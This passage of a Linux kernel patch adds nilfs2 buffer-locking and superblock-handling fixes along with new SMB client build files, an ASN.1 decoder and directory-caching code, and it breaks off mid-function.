+-	SMB_ACL_TAG_INVALID = 0,
+-	SMB_ACL_USER,
+-	SMB_ACL_USER_OBJ,
+-	SMB_ACL_GROUP,
+-	SMB_ACL_GROUP_OBJ,
+-	SMB_ACL_OTHER,
+-	SMB_ACL_MASK
+-};
+-
+-#define SMB_ACL_READ			4
+-#define SMB_ACL_WRITE			2
+-#define SMB_ACL_EXECUTE			1
+-
+-struct xattr_acl_entry {
+-	int type;
+-	uid_t uid;
+-	gid_t gid;
+-	mode_t perm;
+-};
+-
+-/*
+- * xattr_smb_acl structure is used for computing posix acl hash.
+- */
+-struct xattr_smb_acl {
+-	int count;
+-	int next;
+-	struct xattr_acl_entry entries[];
+-};
+-
+-/* 64bytes hash in xattr_ntacl is computed with sha256 */
+-#define XATTR_SD_HASH_TYPE_SHA256	0x1
+-#define XATTR_SD_HASH_SIZE		64
+-
+-/*
+- * xattr_ntacl is used for storing ntacl and hashes.
+- * Hash is used for checking valid posix acl and ntacl in xattr.
+- */
+-struct xattr_ntacl {
+-	__u16	version; /* version 4*/
+-	void	*sd_buf;
+-	__u32	sd_size;
+-	__u16	hash_type; /* hash type */
+-	__u8	desc[10]; /* posix_acl description */
+-	__u16	desc_len;
+-	__u64	current_time;
+-	__u8	hash[XATTR_SD_HASH_SIZE]; /* 64bytes hash for ntacl */
+-	__u8	posix_acl_hash[XATTR_SD_HASH_SIZE]; /* 64bytes hash for posix acl */
+-};
+-
+-/* DOS ATTRIBUITE XATTR PREFIX */
+-#define DOS_ATTRIBUTE_PREFIX		"DOSATTRIB"
+-#define DOS_ATTRIBUTE_PREFIX_LEN	(sizeof(DOS_ATTRIBUTE_PREFIX) - 1)
+-#define XATTR_NAME_DOS_ATTRIBUTE	(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX)
+-#define XATTR_NAME_DOS_ATTRIBUTE_LEN	\
+-		(sizeof(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX) - 1)
+-
+-/* STREAM XATTR PREFIX */
+-#define STREAM_PREFIX			"DosStream."
+-#define STREAM_PREFIX_LEN		(sizeof(STREAM_PREFIX) - 1)
+-#define XATTR_NAME_STREAM		(XATTR_USER_PREFIX STREAM_PREFIX)
+-#define XATTR_NAME_STREAM_LEN		(sizeof(XATTR_NAME_STREAM) - 1)
+-
+-/* SECURITY DESCRIPTOR(NTACL) XATTR PREFIX */
+-#define SD_PREFIX			"NTACL"
+-#define SD_PREFIX_LEN	(sizeof(SD_PREFIX) - 1)
+-#define XATTR_NAME_SD	(XATTR_SECURITY_PREFIX SD_PREFIX)
+-#define XATTR_NAME_SD_LEN	\
+-		(sizeof(XATTR_SECURITY_PREFIX SD_PREFIX) - 1)
+-
+-#endif /* __XATTR_H__ */
+diff --git a/fs/nilfs2/page.c b/fs/nilfs2/page.c
+index 39b7eea2642a0..7d31833e68d1f 100644
+--- a/fs/nilfs2/page.c
++++ b/fs/nilfs2/page.c
+@@ -369,7 +369,15 @@ void nilfs_clear_dirty_pages(struct address_space *mapping, bool silent)
+ 			struct page *page = pvec.pages[i];
+ 
+ 			lock_page(page);
+-			nilfs_clear_dirty_page(page, silent);
++
++			/*
++			 * This page may have been removed from the address
++			 * space by truncation or invalidation when the lock
++			 * was acquired.  Skip processing in that case.
++			 */
++			if (likely(page->mapping == mapping))
++				nilfs_clear_dirty_page(page, silent);
++
+ 			unlock_page(page);
+ 		}
+ 		pagevec_release(&pvec);
+diff --git a/fs/nilfs2/segbuf.c b/fs/nilfs2/segbuf.c
+index 1362ccb64ec7d..6e59dc19a7324 100644
+--- a/fs/nilfs2/segbuf.c
++++ b/fs/nilfs2/segbuf.c
+@@ -101,6 +101,12 @@ int nilfs_segbuf_extend_segsum(struct nilfs_segment_buffer *segbuf)
+ 	if (unlikely(!bh))
+ 		return -ENOMEM;
+ 
++	lock_buffer(bh);
++	if (!buffer_uptodate(bh)) {
++		memset(bh->b_data, 0, bh->b_size);
++		set_buffer_uptodate(bh);
++	}
++	unlock_buffer(bh);
+ 	nilfs_segbuf_add_segsum_buffer(segbuf, bh);
+ 	return 0;
+ }
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 209e46431a5ea..6cf64023be31e 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -979,10 +979,13 @@ static void nilfs_segctor_fill_in_super_root(struct nilfs_sc_info *sci,
+ 	unsigned int isz, srsz;
+ 
+ 	bh_sr = NILFS_LAST_SEGBUF(&sci->sc_segbufs)->sb_super_root;
++
++	lock_buffer(bh_sr);
+ 	raw_sr = (struct nilfs_super_root *)bh_sr->b_data;
+ 	isz = nilfs->ns_inode_size;
+ 	srsz = NILFS_SR_BYTES(isz);
+ 
++	raw_sr->sr_sum = 0;  /* Ensure initialization within this update */
+ 	raw_sr->sr_bytes = cpu_to_le16(srsz);
+ 	raw_sr->sr_nongc_ctime
+ 		= cpu_to_le64(nilfs_doing_gc() ?
+@@ -996,6 +999,8 @@ static void nilfs_segctor_fill_in_super_root(struct nilfs_sc_info *sci,
+ 	nilfs_write_inode_common(nilfs->ns_sufile, (void *)raw_sr +
+ 				 NILFS_SR_SUFILE_OFFSET(isz), 1);
+ 	memset((void *)raw_sr + srsz, 0, nilfs->ns_blocksize - srsz);
++	set_buffer_uptodate(bh_sr);
++	unlock_buffer(bh_sr);
+ }
+ 
+ static void nilfs_redirty_inodes(struct list_head *head)
+@@ -1778,6 +1783,7 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 	list_for_each_entry(segbuf, logs, sb_list) {
+ 		list_for_each_entry(bh, &segbuf->sb_segsum_buffers,
+ 				    b_assoc_buffers) {
++			clear_buffer_uptodate(bh);
+ 			if (bh->b_page != bd_page) {
+ 				if (bd_page)
+ 					end_page_writeback(bd_page);
+@@ -1789,6 +1795,7 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 				    b_assoc_buffers) {
+ 			clear_buffer_async_write(bh);
+ 			if (bh == segbuf->sb_super_root) {
++				clear_buffer_uptodate(bh);
+ 				if (bh->b_page != bd_page) {
+ 					end_page_writeback(bd_page);
+ 					bd_page = bh->b_page;
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 77f1e5778d1c8..9ba4933087af0 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -372,10 +372,31 @@ static int nilfs_move_2nd_super(struct super_block *sb, loff_t sb2off)
+ 		goto out;
+ 	}
+ 	nsbp = (void *)nsbh->b_data + offset;
+-	memset(nsbp, 0, nilfs->ns_blocksize);
+ 
++	lock_buffer(nsbh);
+ 	if (sb2i >= 0) {
++		/*
++		 * The position of the second superblock only changes by 4KiB,
++		 * which is larger than the maximum superblock data size
++		 * (= 1KiB), so there is no need to use memmove() to allow
++		 * overlap between source and destination.
++		 */
+ 		memcpy(nsbp, nilfs->ns_sbp[sb2i], nilfs->ns_sbsize);
++
++		/*
++		 * Zero fill after copy to avoid overwriting in case of move
++		 * within the same block.
++		 */
++		memset(nsbh->b_data, 0, offset);
++		memset((void *)nsbp + nilfs->ns_sbsize, 0,
++		       nsbh->b_size - offset - nilfs->ns_sbsize);
++	} else {
++		memset(nsbh->b_data, 0, nsbh->b_size);
++	}
++	set_buffer_uptodate(nsbh);
++	unlock_buffer(nsbh);
++
++	if (sb2i >= 0) {
+ 		brelse(nilfs->ns_sbh[sb2i]);
+ 		nilfs->ns_sbh[sb2i] = nsbh;
+ 		nilfs->ns_sbp[sb2i] = nsbp;
+diff --git a/fs/smb/Kconfig b/fs/smb/Kconfig
+new file mode 100644
+index 0000000000000..ef425789fa6ad
+--- /dev/null
++++ b/fs/smb/Kconfig
+@@ -0,0 +1,11 @@
++# SPDX-License-Identifier: GPL-2.0-only
++#
++# smbfs configuration
++
++source "fs/smb/client/Kconfig"
++source "fs/smb/server/Kconfig"
++
++config SMBFS
++	tristate
++	default y if CIFS=y || SMB_SERVER=y
++	default m if CIFS=m || SMB_SERVER=m
+diff --git a/fs/smb/Makefile b/fs/smb/Makefile
+new file mode 100644
+index 0000000000000..9a1bf59a1a651
+--- /dev/null
++++ b/fs/smb/Makefile
+@@ -0,0 +1,5 @@
++# SPDX-License-Identifier: GPL-2.0
++
++obj-$(CONFIG_SMBFS)		+= common/
++obj-$(CONFIG_CIFS)		+= client/
++obj-$(CONFIG_SMB_SERVER)	+= server/
+diff --git a/fs/smb/client/Kconfig b/fs/smb/client/Kconfig
+new file mode 100644
+index 0000000000000..3b7e3b9e4fd2e
+--- /dev/null
++++ b/fs/smb/client/Kconfig
+@@ -0,0 +1,203 @@
++# SPDX-License-Identifier: GPL-2.0-only
++config CIFS
++	tristate "SMB3 and CIFS support (advanced network filesystem)"
++	depends on INET
++	select NLS
++	select CRYPTO
++	select CRYPTO_MD5
++	select CRYPTO_SHA256
++	select CRYPTO_SHA512
++	select CRYPTO_CMAC
++	select CRYPTO_HMAC
++	select CRYPTO_AEAD2
++	select CRYPTO_CCM
++	select CRYPTO_GCM
++	select CRYPTO_ECB
++	select CRYPTO_AES
++	select KEYS
++	select DNS_RESOLVER
++	select ASN1
++	select OID_REGISTRY
++	help
++	  This is the client VFS module for the SMB3 family of NAS protocols,
++	  (including support for the most recent, most secure dialect SMB3.1.1)
++	  as well as for earlier dialects such as SMB2.1, SMB2 and the older
++	  Common Internet File System (CIFS) protocol.  CIFS was the successor
++	  to the original dialect, the Server Message Block (SMB) protocol, the
++	  native file sharing mechanism for most early PC operating systems.
++
++	  The SMB3 protocol is supported by most modern operating systems
++	  and NAS appliances (e.g. Samba, Windows 10, Windows Server 2016,
++	  MacOS) and even in the cloud (e.g. Microsoft Azure).
++	  The older CIFS protocol was included in Windows NT4, 2000 and XP (and
++	  later) as well by Samba (which provides excellent CIFS and SMB3
++	  server support for Linux and many other operating systems). Use of
++	  dialects older than SMB2.1 is often discouraged on public networks.
++	  This module also provides limited support for OS/2 and Windows ME
++	  and similar very old servers.
++
++	  This module provides an advanced network file system client
++	  for mounting to SMB3 (and CIFS) compliant servers.  It includes
++	  support for DFS (hierarchical name space), secure per-user
++	  session establishment via Kerberos or NTLM or NTLMv2, RDMA
++	  (smbdirect), advanced security features, per-share encryption,
++	  directory leases, safe distributed caching (oplock), optional packet
++	  signing, Unicode and other internationalization improvements.
++
++	  In general, the default dialects, SMB3 and later, enable better
++	  performance, security and features, than would be possible with CIFS.
++	  Note that when mounting to Samba, due to the CIFS POSIX extensions,
++	  CIFS mounts can provide slightly better POSIX compatibility
++	  than SMB3 mounts. SMB2/SMB3 mount options are also
++	  slightly simpler (compared to CIFS) due to protocol improvements.
++
++	  If you need to mount to Samba, Azure, Macs or Windows from this machine, say Y.
++
++config CIFS_STATS2
++	bool "Extended statistics"
++	depends on CIFS
++	default y
++	help
++	  Enabling this option will allow more detailed statistics on SMB
++	  request timing to be displayed in /proc/fs/cifs/DebugData and also
++	  allow optional logging of slow responses to dmesg (depending on the
++	  value of /proc/fs/cifs/cifsFYI). See Documentation/admin-guide/cifs/usage.rst
++	  for more details. These additional statistics may have a minor effect
++	  on performance and memory utilization.
++
++	  If unsure, say Y.
++
++config CIFS_ALLOW_INSECURE_LEGACY
++	bool "Support legacy servers which use less secure dialects"
++	depends on CIFS
++	default y
++	help
++	  Modern dialects, SMB2.1 and later (including SMB3 and 3.1.1), have
++	  additional security features, including protection against
++	  man-in-the-middle attacks and stronger crypto hashes, so the use
++	  of legacy dialects (SMB1/CIFS and SMB2.0) is discouraged.
++
++	  Disabling this option prevents users from using vers=1.0 or vers=2.0
++	  on mounts with cifs.ko
++
++	  If unsure, say Y.
++
++config CIFS_UPCALL
++	bool "Kerberos/SPNEGO advanced session setup"
++	depends on CIFS
++	help
++	  Enables an upcall mechanism for CIFS which accesses userspace helper
++	  utilities to provide SPNEGO packaged (RFC 4178) Kerberos tickets
++	  which are needed to mount to certain secure servers (for which more
++	  secure Kerberos authentication is required). If unsure, say Y.
++
++config CIFS_XATTR
++	bool "CIFS extended attributes"
++	depends on CIFS
++	help
++	  Extended attributes are name:value pairs associated with inodes by
++	  the kernel or by users (see the attr(5) manual page for details).
++	  CIFS maps the name of extended attributes beginning with the user
++	  namespace prefix to SMB/CIFS EAs.  EAs are stored on Windows
++	  servers without the user namespace prefix, but their names are
++	  seen by Linux cifs clients prefaced by the user namespace prefix.
++	  The system namespace (used by some filesystems to store ACLs) is
++	  not supported at this time.
++
++	  If unsure, say Y.
++
++config CIFS_POSIX
++	bool "CIFS POSIX Extensions"
++	depends on CIFS && CIFS_ALLOW_INSECURE_LEGACY && CIFS_XATTR
++	help
++	  Enabling this option will cause the cifs client to attempt to
++	  negotiate a newer dialect with servers, such as Samba 3.0.5
++	  or later, that optionally can handle more POSIX like (rather
++	  than Windows like) file behavior.  It also enables
++	  support for POSIX ACLs (getfacl and setfacl) to servers
++	  (such as Samba 3.10 and later) which can negotiate
++	  CIFS POSIX ACL support.  If unsure, say N.
++
++config CIFS_DEBUG
++	bool "Enable CIFS debugging routines"
++	default y
++	depends on CIFS
++	help
++	  Enabling this option adds helpful debugging messages to
++	  the cifs code which increases the size of the cifs module.
++	  If unsure, say Y.
++
++config CIFS_DEBUG2
++	bool "Enable additional CIFS debugging routines"
++	depends on CIFS_DEBUG
++	help
++	  Enabling this option adds a few more debugging routines
++	  to the cifs code which slightly increases the size of
++	  the cifs module and can cause additional logging of debug
++	  messages in some error paths, slowing performance. This
++	  option can be turned off unless you are debugging
++	  cifs problems.  If unsure, say N.
++
++config CIFS_DEBUG_DUMP_KEYS
++	bool "Dump encryption keys for offline decryption (Unsafe)"
++	depends on CIFS_DEBUG
++	help
++	  Enabling this will dump the encryption and decryption keys
++	  used to communicate on an encrypted share connection on the
++	  console. This allows Wireshark to decrypt and dissect
++	  encrypted network captures. Enable this carefully.
++	  If unsure, say N.
++
++config CIFS_DFS_UPCALL
++	bool "DFS feature support"
++	depends on CIFS
++	help
++	  Distributed File System (DFS) support is used to access shares
++	  transparently in an enterprise name space, even if the share
++	  moves to a different server.  This feature also enables
++	  an upcall mechanism for CIFS which contacts userspace helper
++	  utilities to provide server name resolution (host names to
++	  IP addresses) which is needed in order to reconnect to
++	  servers if their addresses change or for implicit mounts of
++	  DFS junction points. If unsure, say Y.
++
++config CIFS_SWN_UPCALL
++	bool "SWN feature support"
++	depends on CIFS
++	help
++	  The Service Witness Protocol (SWN) is used to get notifications
++	  from a highly available server of resource state changes. This
++	  feature enables an upcall mechanism for CIFS which contacts a
++	  userspace daemon to establish the DCE/RPC connection to retrieve
++	  the cluster available interfaces and resource change notifications.
++	  If unsure, say Y.
++
++config CIFS_NFSD_EXPORT
++	bool "Allow nfsd to export CIFS file system"
++	depends on CIFS && BROKEN
++	help
++	  Allows NFS server to export a CIFS mounted share (nfsd over cifs)
++
++config CIFS_SMB_DIRECT
++	bool "SMB Direct support"
++	depends on CIFS=m && INFINIBAND && INFINIBAND_ADDR_TRANS || CIFS=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
++	help
++	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
++	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
++	  say Y.
++
++config CIFS_FSCACHE
++	bool "Provide CIFS client caching support"
++	depends on CIFS=m && FSCACHE || CIFS=y && FSCACHE=y
++	help
++	  Makes CIFS FS-Cache capable. Say Y here if you want your CIFS data
++	  to be cached locally on disk through the general filesystem cache
++	  manager. If unsure, say N.
++
++config CIFS_ROOT
++	bool "SMB root file system (Experimental)"
++	depends on CIFS=y && IP_PNP
++	help
++	  Enables root file system support over SMB protocol.
++
++	  Most people say N here.
+diff --git a/fs/smb/client/Makefile b/fs/smb/client/Makefile
+new file mode 100644
+index 0000000000000..7c9785973f496
+--- /dev/null
++++ b/fs/smb/client/Makefile
+@@ -0,0 +1,34 @@
++# SPDX-License-Identifier: GPL-2.0
++#
++# Makefile for Linux CIFS/SMB2/SMB3 VFS client
++#
++ccflags-y += -I$(src)		# needed for trace events
++obj-$(CONFIG_CIFS) += cifs.o
++
++cifs-y := trace.o cifsfs.o cifs_debug.o connect.o dir.o file.o \
++	  inode.o link.o misc.o netmisc.o smbencrypt.o transport.o \
++	  cached_dir.o cifs_unicode.o nterr.o cifsencrypt.o \
++	  readdir.o ioctl.o sess.o export.o unc.o winucase.o \
++	  smb2ops.o smb2maperror.o smb2transport.o \
++	  smb2misc.o smb2pdu.o smb2inode.o smb2file.o cifsacl.o fs_context.o \
++	  dns_resolve.o cifs_spnego_negtokeninit.asn1.o asn1.o
++
++$(obj)/asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.h
++
++$(obj)/cifs_spnego_negtokeninit.asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.c $(obj)/cifs_spnego_negtokeninit.asn1.h
++
++cifs-$(CONFIG_CIFS_XATTR) += xattr.o
++
++cifs-$(CONFIG_CIFS_UPCALL) += cifs_spnego.o
++
++cifs-$(CONFIG_CIFS_DFS_UPCALL) += cifs_dfs_ref.o dfs_cache.o
++
++cifs-$(CONFIG_CIFS_SWN_UPCALL) += netlink.o cifs_swn.o
++
++cifs-$(CONFIG_CIFS_FSCACHE) += fscache.o
++
++cifs-$(CONFIG_CIFS_SMB_DIRECT) += smbdirect.o
++
++cifs-$(CONFIG_CIFS_ROOT) += cifsroot.o
++
++cifs-$(CONFIG_CIFS_ALLOW_INSECURE_LEGACY) += smb1ops.o cifssmb.o
+diff --git a/fs/smb/client/asn1.c b/fs/smb/client/asn1.c
+new file mode 100644
+index 0000000000000..b5724ef9f182f
+--- /dev/null
++++ b/fs/smb/client/asn1.c
+@@ -0,0 +1,63 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/oid_registry.h>
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++#include "cifs_spnego_negtokeninit.asn1.h"
++
++int
++decode_negTokenInit(unsigned char *security_blob, int length,
++		    struct TCP_Server_Info *server)
++{
++	if (asn1_ber_decoder(&cifs_spnego_negtokeninit_decoder, server,
++			     security_blob, length) == 0)
++		return 1;
++	else
++		return 0;
++}
++
++int cifs_gssapi_this_mech(void *context, size_t hdrlen,
++			  unsigned char tag, const void *value, size_t vlen)
++{
++	enum OID oid;
++
++	oid = look_up_OID(value, vlen);
++	if (oid != OID_spnego) {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		cifs_dbg(FYI, "Error decoding negTokenInit header: unexpected OID %s\n",
++			 buf);
++		return -EBADMSG;
++	}
++	return 0;
++}
++
++int cifs_neg_token_init_mech_type(void *context, size_t hdrlen,
++				  unsigned char tag,
++				  const void *value, size_t vlen)
++{
++	struct TCP_Server_Info *server = context;
++	enum OID oid;
++
++	oid = look_up_OID(value, vlen);
++	if (oid == OID_mskrb5)
++		server->sec_mskerberos = true;
++	else if (oid == OID_krb5u2u)
++		server->sec_kerberosu2u = true;
++	else if (oid == OID_krb5)
++		server->sec_kerberos = true;
++	else if (oid == OID_ntlmssp)
++		server->sec_ntlmssp = true;
++	else {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		cifs_dbg(FYI, "Decoding negTokenInit: unsupported OID %s\n",
++			 buf);
++	}
++	return 0;
++}
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+new file mode 100644
+index 0000000000000..bfc964b36c72e
+--- /dev/null
++++ b/fs/smb/client/cached_dir.c
+@@ -0,0 +1,606 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *  Functions to handle the cached directory entries
++ *
++ *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
++ */
++
++#include <linux/namei.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "smb2proto.h"
++#include "cached_dir.h"
++
++static struct cached_fid *init_cached_dir(const char *path);
++static void free_cached_dir(struct cached_fid *cfid);
++static void smb2_close_cached_fid(struct kref *ref);
++
++static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
++						    const char *path,
++						    bool lookup_only)
++{
++	struct cached_fid *cfid;
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry(cfid, &cfids->entries, entry) {
++		if (!strcmp(cfid->path, path)) {
++			/*
++			 * If it doesn't have a lease it is either not yet
++			 * fully cached or it may be in the process of
++			 * being deleted due to a lease break.
++			 */
++			if (!cfid->has_lease) {
++				spin_unlock(&cfids->cfid_list_lock);
++				return NULL;
++			}
++			kref_get(&cfid->refcount);
++			spin_unlock(&cfids->cfid_list_lock);
++			return cfid;
++		}
++	}
++	if (lookup_only) {
++		spin_unlock(&cfids->cfid_list_lock);
++		return NULL;
++	}
++	if (cfids->num_entries >= MAX_CACHED_FIDS) {
++		spin_unlock(&cfids->cfid_list_lock);
++		return NULL;
++	}
++	cfid = init_cached_dir(path);
++	if (cfid == NULL) {
++		spin_unlock(&cfids->cfid_list_lock);
++		return NULL;
++	}
++	cfid->cfids = cfids;
++	cfids->num_entries++;
++	list_add(&cfid->entry, &cfids->entries);
++	cfid->on_list = true;
++	kref_get(&cfid->refcount);
++	spin_unlock(&cfids->cfid_list_lock);
++	return cfid;
++}
++
++static struct dentry *
++path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
++{
++	struct dentry *dentry;
++	const char *s, *p;
++	char sep;
++
++	sep = CIFS_DIR_SEP(cifs_sb);
++	dentry = dget(cifs_sb->root);
++	s = path;
++
++	do {
++		struct inode *dir = d_inode(dentry);
++		struct dentry *child;
++
++		if (!S_ISDIR(dir->i_mode)) {
++			dput(dentry);
++			dentry = ERR_PTR(-ENOTDIR);
++			break;
++		}
++
++		/* skip separators */
++		while (*s == sep)
++			s++;
++		if (!*s)
++			break;
++		p = s++;
++		/* next separator */
++		while (*s && *s != sep)
++			s++;
++
++		child = lookup_positive_unlocked(p, dentry, s - p);
++		dput(dentry);
++		dentry = child;
++	} while (!IS_ERR(dentry));
++	return dentry;
++}
++
++static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
++				  const char *path)
++{
++	size_t len = 0;
++
++	if (!*path)
++		return path;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++	    cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath) + 1;
++		if (unlikely(len > strlen(path)))
++			return ERR_PTR(-EINVAL);
++	}
++	return path + len;
++}
++
++/*
++ * Open the and cache a directory handle.
++ * If error then *cfid is not initialized.
++ */
++int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
++		    const char *path,
++		    struct cifs_sb_info *cifs_sb,
++		    bool lookup_only, struct cached_fid **ret_cfid)
++{
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct cifs_open_parms oparms;
++	struct smb2_create_rsp *o_rsp = NULL;
++	struct smb2_query_info_rsp *qi_rsp = NULL;
++	int resp_buftype[2];
++	struct smb_rqst rqst[2];
++	struct kvec rsp_iov[2];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	int rc, flags = 0;
++	__le16 *utf16_path = NULL;
++	u8 oplock = SMB2_OPLOCK_LEVEL_II;
++	struct cifs_fid *pfid;
++	struct dentry *dentry = NULL;
++	struct cached_fid *cfid;
++	struct cached_fids *cfids;
++	const char *npath;
++
++	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
++	    is_smb1_server(tcon->ses->server))
++		return -EOPNOTSUPP;
++
++	ses = tcon->ses;
++	server = ses->server;
++	cfids = tcon->cfids;
++
++	if (!server->ops->new_lease_key)
++		return -EIO;
++
++	if (cifs_sb->root == NULL)
++		return -ENOENT;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	cfid = find_or_create_cached_dir(cfids, path, lookup_only);
++	if (cfid == NULL) {
++		kfree(utf16_path);
++		return -ENOENT;
++	}
++	/*
++	 * At this point we either have a lease already and we can just
++	 * return it. If not we are guaranteed to be the only thread accessing
++	 * this cfid.
++	 */
++	if (cfid->has_lease) {
++		*ret_cfid = cfid;
++		kfree(utf16_path);
++		return 0;
++	}
++
++	/*
++	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
++	 * calling ->lookup() which already adds those through
++	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
++	 * below when trying to send compounded request and then potentially
++	 * having a different prefix path (e.g. after DFS failover).
++	 */
++	npath = path_no_prefix(cifs_sb, path);
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++		kfree(utf16_path);
++		return rc;
++	}
++
++	/*
++	 * We do not hold the lock for the open because in case
++	 * SMB2_open needs to reconnect.
++	 * This is safe because no other thread will be able to get a ref
++	 * to the cfid until we have finished opening the file and (possibly)
++	 * acquired a lease.
++	 */
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	pfid = &cfid->fid;
++	server->ops->new_lease_key(pfid);
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.fid = pfid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto oshr_free;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	memset(&qi_iov, 0, sizeof(qi_iov));
++	rqst[1].rq_iov = qi_iov;
++	rqst[1].rq_nvec = 1;
++
++	rc = SMB2_query_info_init(tcon, server,
++				  &rqst[1], COMPOUND_FID,
++				  COMPOUND_FID, FILE_ALL_INFORMATION,
++				  SMB2_O_INFO_FILE, 0,
++				  sizeof(struct smb2_file_all_info) +
++				  PATH_MAX * 2, 0, NULL);
++	if (rc)
++		goto oshr_free;
++
++	smb2_set_related(&rqst[1]);
++
++	rc = compound_send_recv(xid, ses, server,
++				flags, 2, rqst,
++				resp_buftype, rsp_iov);
++	if (rc) {
++		if (rc == -EREMCHG) {
++			tcon->need_reconnect = true;
++			pr_warn_once("server share %s deleted\n",
++				     tcon->tree_name);
++		}
++		goto oshr_free;
++	}
++	cfid->tcon = tcon;
++	cfid->is_open = true;
++
++	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
++	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
++	oparms.fid->volatile_fid = o_rsp->VolatileFileId;
++#ifdef CONFIG_CIFS_DEBUG2
++	oparms.fid->mid = le64_to_cpu(o_rsp->hdr.MessageId);
++#endif /* CIFS_DEBUG2 */
++
++	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
++		goto oshr_free;
++
++	smb2_parse_contexts(server, o_rsp,
++			    &oparms.fid->epoch,
++			    oparms.fid->lease_key, &oplock,
++			    NULL, NULL);
++	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
++		goto oshr_free;
++	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
++	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
++		goto oshr_free;
++	if (!smb2_validate_and_copy_iov(
++				le16_to_cpu(qi_rsp->OutputBufferOffset),
++				sizeof(struct smb2_file_all_info),
++				&rsp_iov[1], sizeof(struct smb2_file_all_info),
++				(char *)&cfid->file_all_info))
++		cfid->file_all_info_is_valid = true;
++
++	if (!npath[0])
++		dentry = dget(cifs_sb->root);
++	else {
++		dentry = path_to_dentry(cifs_sb, npath);
++		if (IS_ERR(dentry)) {
++			rc = -ENOENT;
++			goto oshr_free;
++		}
++	}
++	cfid->dentry = dentry;
++	cfid->time = jiffies;
++	cfid->has_lease = true;
++
++oshr_free:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_query_info_free(&rqst[1]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	spin_lock(&cfids->cfid_list_lock);
++	if (rc && !cfid->has_lease) {
++		if (cfid->on_list) {
++			list_del(&cfid->entry);
++			cfid->on_list = false;
++			cfids->num_entries--;
++		}
++		rc = -ENOENT;
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++	if (!rc && !cfid->has_lease) {
++		/*
++		 * We are guaranteed to have two references at this point.
++		 * One for the caller and one for a potential lease.
++		 * Release the Lease-ref so that the directory will be closed
++		 * when the caller closes the cached handle.
++		 */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
++	if (rc) {
++		if (cfid->is_open)
++			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++				   cfid->fid.volatile_fid);
++		free_cached_dir(cfid);
++		cfid = NULL;
++	}
++
++	if (rc == 0) {
++		*ret_cfid = cfid;
++		atomic_inc(&tcon->num_remote_opens);
++	}
++
++	return rc;
++}
++
++int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
++			      struct dentry *dentry,
++			      struct cached_fid **ret_cfid)
++{
++	struct cached_fid *cfid;
++	struct cached_fids *cfids = tcon->cfids;
++
++	if (cfids == NULL)
++		return -ENOENT;
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry(cfid, &cfids->entries, entry) {
